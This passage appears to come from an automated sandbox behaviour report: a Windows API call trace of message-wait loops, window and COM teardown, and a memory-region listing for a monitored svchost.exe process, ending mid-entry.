MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0209.703] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0209.930] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0210.144] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0210.310] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0210.469] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0210.644] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0211.011] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0211.209] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0211.446] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0211.683] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0212.005] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0212.268] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0212.617] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0212.905] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0213.155] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0213.481] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0213.764] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0214.095] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0214.324] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0214.645] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0214.914] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0215.118] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0215.338] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0215.803] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0216.096] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0216.526] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0217.086] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0217.509] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0217.705] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0218.132] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0218.732] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0218.910] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0219.434] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0219.613] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0219.847] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0220.048] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0220.377] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0220.862] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0221.270] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0221.556] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0221.750] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0223.149] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0223.404] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0224.085] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0224.698] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0224.879] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0225.075] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0225.377] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0225.697] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0225.963] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0226.222] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0226.485] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0226.722] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0226.957] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0227.257] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0227.519] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0227.757] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0228.017] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0228.229] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0228.567] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0228.858] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0229.113] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0229.524] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0229.754] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0229.940] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0230.098] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0230.345] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0230.588] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0230.813] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0231.063] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0231.392] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0231.605] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0231.843] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0232.047] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0232.327] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0232.639] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0232.810] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0232.998] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0233.154] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0233.363] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0233.655] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0233.902] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0234.230] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0234.557] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0234.901] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0235.105] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0235.307] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0235.530] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0235.824] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0236.112] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0236.243] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0236.524] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0236.741] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0237.008] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0237.196] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0237.350] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0237.570] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0237.752] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0238.002] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0238.177] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0238.370] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0238.543] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0238.754] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0238.943] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0239.066] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0239.214] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0239.369] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0239.535] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x0 [0239.649] PeekMessageW (in: lpMsg=0x5ecf224, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x5ecf224) returned 1 [0239.661] IsWindow (hWnd=0x900cc) returned 1 [0239.663] GetModuleHandleW (lpModuleName="user32.dll") returned 0x773b0000 [0239.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x5ecf134, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcWvpÔ\x96:lDþNr\x04òì\x05\x01", lpUsedDefaultChar=0x0) returned 14 [0239.664] GetProcAddress (hModule=0x773b0000, lpProcName="DefWindowProcW") returned 0x77a125dd [0239.665] SetWindowLongW (hWnd=0x900cc, nIndex=-4, dwNewLong=2007049693) returned 78908294 [0239.666] SetClassLongW (hWnd=0x900cc, nIndex=-24, dwNewLong=2007049693) returned 0x4b40b86 [0239.666] IsWindow (hWnd=0x900cc) returned 1 [0239.667] DestroyWindow (hWnd=0x900cc) returned 1 [0239.673] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0239.673] UnregisterClassW (lpClassName=".NET-BroadcastEventWindow.4.0.0.0.5c39d4.0", hInstance=0x400000) returned 1 [0239.673] SetConsoleCtrlHandler (HandlerRoutine=0x4b40b5e, Add=0) returned 1 [0239.673] SetEvent (hEvent=0x27c) returned 1 [0239.675] CoGetContextToken (in: pToken=0x5ecf56c | out: pToken=0x5ecf56c) returned 0x0 [0239.675] IUnknown:QueryInterface (in: This=0x6d0ca0, riid=0x7258b24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ecf590 | out: ppvObject=0x5ecf590*=0x6d0cac) returned 0x0 [0239.675] IComThreadingInfo:GetCurrentThreadType (in: This=0x6d0cac, pThreadType=0x5ecf5bc | out: pThreadType=0x5ecf5bc*=0) returned 0x0 [0239.675] IUnknown:Release (This=0x6d0cac) returned 0x1 [0239.676] CoUninitialize () Thread: id = 153 os_tid = 0xf90 Thread: id = 157 os_tid = 0xfac [0237.688] CoGetContextToken (in: pToken=0x588fec4 | out: pToken=0x588fec4) returned 0x0 [0237.688] IUnknown:QueryInterface (in: This=0x6d0ca0, riid=0x7258b24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x588fee8 | out: ppvObject=0x588fee8*=0x6d0cac) returned 0x0 [0237.688] IComThreadingInfo:GetCurrentThreadType (in: This=0x6d0cac, pThreadType=0x588ff14 | out: pThreadType=0x588ff14*=0) returned 0x0 [0237.688] IUnknown:Release (This=0x6d0cac) returned 0x1 [0237.688] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 Process: id = "9" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xdb4d000" os_pid = "0x2c0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7ac" [0xc000000f], "LOCAL" [0x7] Region: id = 2497 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2498 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 2499 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2500 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2501 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2502 start_va = 0xd0000 end_va = 0x136fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2503 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 2504 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2505 start_va = 0x160000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2506 start_va = 0x260000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 2507 start_va = 0x360000 end_va = 0x36cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 2508 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 2509 start_va = 0x380000 end_va = 0x507fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 2510 start_va = 0x510000 end_va = 0x690fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 2511 start_va = 0x6a0000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 2512 start_va = 0x760000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 2513 start_va = 0x7a0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 2514 start_va = 0x7c0000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 2515 start_va = 0x840000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 2516 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 2517 start_va = 0x880000 end_va = 0x880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 2518 start_va = 0x890000 end_va = 0x891fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 2519 start_va = 0x8a0000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 2520 start_va = 0x8b0000 end_va = 0x8b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 2521 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 2522 start_va = 0xa00000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 2523 start_va = 0xa80000 end_va = 0xd4efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2524 start_va = 0xd50000 end_va = 0xdb1fff monitored = 0 entry_point = 0xd608d8 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 2525 start_va = 0xdc0000 end_va = 0xdc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 2526 start_va = 0xdd0000 end_va = 0xdd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 2527 start_va = 0xde0000 end_va = 0xde0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000de0000" filename = "" Region: id = 2528 start_va = 0xdf0000 end_va = 0xdf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 2529 start_va = 0xe00000 end_va = 0xe00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 2530 start_va = 0xe10000 end_va = 0xe10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e10000" filename = "" Region: id = 2531 start_va = 0xe20000 end_va = 0xe27fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 2532 start_va = 0xe30000 end_va = 0xf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 2533 start_va = 0xf90000 end_va = 0x100ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 2534 start_va = 0x1030000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 2535 start_va = 0x10b0000 end_va = 0x112ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 2536 start_va = 0x1150000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 2537 start_va = 0x1220000 end_va = 0x129ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 2538 start_va = 0x12b0000 end_va = 0x132ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 2539 start_va = 0x1330000 end_va = 0x13affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 2540 start_va = 0x13e0000 end_va = 0x145ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013e0000" filename = "" Region: id = 2541 start_va = 0x14d0000 end_va = 0x154ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014d0000" filename = "" Region: id = 2542 start_va = 0x1550000 end_va = 0x174ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001550000" filename = "" Region: id = 2543 start_va = 0x1870000 end_va = 0x18effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001870000" filename = "" Region: id = 2544 start_va = 0x18f0000 end_va = 0x196ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018f0000" filename = "" Region: id = 2545 start_va = 0x1990000 end_va = 0x1a0ffff 